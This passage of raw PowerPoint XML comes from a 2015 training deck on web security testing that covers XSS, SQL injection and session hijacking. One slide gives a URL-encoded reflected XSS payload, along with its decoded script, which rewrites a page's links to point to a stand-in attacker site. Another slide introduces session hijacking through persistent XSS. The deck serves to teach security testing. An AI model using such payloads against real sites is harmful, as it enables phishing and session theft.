              <a:t>=%3c%73%63%72%69%70%74%3e%77%69%6e%64%6f%77%2e%6f%6e%6c%6f%61%64%20%3d%20%66%75%6e%63%74%69%6f%6e%28%29%20%7b%76%61%72%20%6c%69%6e%6b%3d%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%73%42%79%54%61%67%4e%61%6d%65%28%22%61%22%29%3b%6c%69%6e%6b%5b%30%5d%2e%68%72%65</a:t>
            </a:r>
            <a:endParaRPr lang="ar-SA" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>which is same as</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>bc.com?name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>window.onload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = function() {</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> link=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>document.getElementsByTagName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>("a");link[0].</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>="http://not-real-xssattackexamples.com/";}&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="252240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XSS Attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In case of persistent attack, the code injected by the attacker will be stored in a secondary storage device (mostly on a database). The damage caused by Persistent attack is more than the non-persistent attack. Here we will see how to hijack other user’s session by performing XSS.</a:t>
            </a:r>
            <a:endParaRPr lang="ar-SA" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12402943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246</TotalTime>
  <Words>818</Words>
  <Application>Microsoft Office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Garamond</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Organic</vt:lpstr>
      <vt:lpstr>Web Sites Security Testing</vt:lpstr>
      <vt:lpstr>Topics</vt:lpstr>
      <vt:lpstr>What is Security Testing?</vt:lpstr>
      <vt:lpstr>Ground Zero</vt:lpstr>
      <vt:lpstr>Elements Of Security Testing</vt:lpstr>
      <vt:lpstr>Cross Site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>Types Of XSS</vt:lpstr>
      <vt:lpstr>Non-Persistent XSS Attack</vt:lpstr>
      <vt:lpstr>Persistent XSS Attack</vt:lpstr>
      <vt:lpstr>Examples for Persistent XSS Attack</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Demo</vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>How SQL Injection works </vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Some SQL Injection Queries</vt:lpstr>
      <vt:lpstr>Demo</vt:lpstr>
      <vt:lpstr>Cookie/Session hijacking</vt:lpstr>
      <vt:lpstr>Another Security Risk</vt:lpstr>
      <vt:lpstr>Demo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Site Security Testing</dc:title>
  <dc:creator>Farooq Rasheed</dc:creator>
  <cp:lastModifiedBy>Farooq Rasheed</cp:lastModifiedBy>
  <cp:revision>37</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2015-12-07T05:49:18Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2015-12-08T07:13:49Z</dcterms:modified>
</cp:coreProperties>
</file>